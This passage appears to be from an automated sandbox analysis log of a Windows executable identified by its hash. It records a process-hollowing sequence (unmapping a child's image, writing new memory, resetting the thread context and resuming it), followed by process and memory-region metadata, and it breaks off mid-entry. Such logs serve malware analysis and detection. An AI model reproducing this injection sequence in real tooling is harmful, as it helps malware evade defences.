lpProcessInformation=0x19f8b8*(hProcess=0x110, hThread=0x10c, dwProcessId=0xc8c, dwThreadId=0x808)) returned 1 [0078.855] VirtualFree (lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.855] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x4f0000 [0078.856] GetThreadContext (in: hThread=0x10c, lpContext=0x4f0000 | out: lpContext=0x4f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x28c000, Edx=0x0, Ecx=0x0, Eax=0x401b2c, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0078.859] ReadProcessMemory (in: hProcess=0x110, lpBaseAddress=0x28c008, lpBuffer=0x19f8ac, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f8ac*, lpNumberOfBytesRead=0x0) returned 1 [0078.859] NtUnmapViewOfSection (ProcessHandle=0x110, BaseAddress=0x400000) returned 0x0 [0078.859] VirtualAllocEx (hProcess=0x110, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0078.860] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x400000, Buffer=0x4c15a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x4c15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0078.862] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x401000, Buffer=0x4c17a0*, NumberOfBytesToWrite=0x7400, NumberOfBytesWritten=0x0 | out: Buffer=0x4c17a0*, NumberOfBytesWritten=0x0) returned 0x0 [0078.865] WriteProcessMemory (in: hProcess=0x110, lpBaseAddress=0x28c008, lpBuffer=0x4c1654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4c1654*, lpNumberOfBytesWritten=0x0) returned 1 [0078.869] SetThreadContext (hThread=0x10c, lpContext=0x4f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x28c000, Edx=0x0, Ecx=0x0, Eax=0x402fa5, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0078.870] ResumeThread (hThread=0x10c) returned 0x1 [0078.908] CloseHandle (hObject=0x10c) returned 1 [0078.908] CloseHandle (hObject=0x110) returned 1 [0078.908] ExitProcess (uExitCode=0x0) [0078.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6905a8 | out: hHeap=0x690000) returned 1 Thread: id = 2 os_tid = 0xcb8 Process: id = "2" image_name = "d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" page_root = "0x48d06000" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb70" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 322 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 323 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 324 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 325 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 326 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 327 start_va = 0x400000 end_va = 0x4a6fff monitored = 1 entry_point = 0x401b2c region_type = mapped_file name = "d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe") Region: id = 328 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 329 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 330 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 331 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 332 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 333 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 335 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 336 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 337 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 338 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 339 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 340 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 341 start_va = 0x410000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 342 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 343 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 344 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 345 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 346 start_va = 0x410000 end_va = 0x4cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 347 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 348 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 349 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 350 start_va = 0x1c0000 end_va = 